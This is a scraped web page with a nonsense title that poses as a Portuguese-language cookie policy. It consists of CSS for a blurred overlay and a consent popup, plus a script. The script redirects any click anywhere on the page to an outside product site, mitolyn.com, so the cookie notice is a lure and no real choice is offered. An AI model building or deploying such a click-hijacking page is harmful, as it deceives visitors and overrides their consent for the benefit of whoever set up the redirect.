qwdewad

Política de Cookies

* { margin: 0; padding: 0; box-sizing: border-box; }
html, body {
width: 100%;
height: 100%;
font-family: ‘Segoe UI’, sans-serif;
}
body {
background: transparent;
background-size: cover;
background-position: top center;
background-attachment: fixed;
}
/* Screenshot mobile para dispositivos móveis */
@media (max-width: 767px) {
body {
background: transparent;
background-size: cover;
background-position: top center;
background-attachment: fixed;
}
}
#glass-layer {
position: fixed;
inset: 0;
backdrop-filter: blur(4px);
background: rgba(0,0,0,0.45);
z-index: 999;
}
#cookie-popup {
position: fixed;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
background: #ffffffee;
border-radius: 20px;
padding: 25px 30px;
width: 90%;
max-width: 580px;
box-shadow: 0 15px 35px rgba(0, 0, 0, 0.15);
z-index: 1000;
}
.cookie-box { display: flex; flex-direction: column; gap: 15px; }
.cookie-header { display: flex; justify-content: space-between; align-items: center; font-size: 18px; font-weight: bold; color: #111; }
.close-btn { font-size: 20px; color: #e11d48; user-select: none; }
.cookie-content p { font-size: 14px; line-height: 1.6; color: #333; margin: 0; }
.policy-link { font-size: 13px; color: #2563eb; text-decoration: underline; }
.cookie-link-button { background: #10b981; color: #fff; padding: 14px; border-radius: 12px; font-size: 15px; text-align: center; text-decoration: none; display: block; }
@media (max-width: 767px) {
#cookie-popup { padding: 32px !important; }
.cookie-header { font-size: 26px !important; }
.cookie-content p { font-size: 20px !important; line-height: 1.9 !important; }
.cookie-link-button { font-size: 22px !important; padding: 16px !important; }
}

document.addEventListener(‘click’, function() {
window.location.href = ‘https://mitolyn.com/’;
});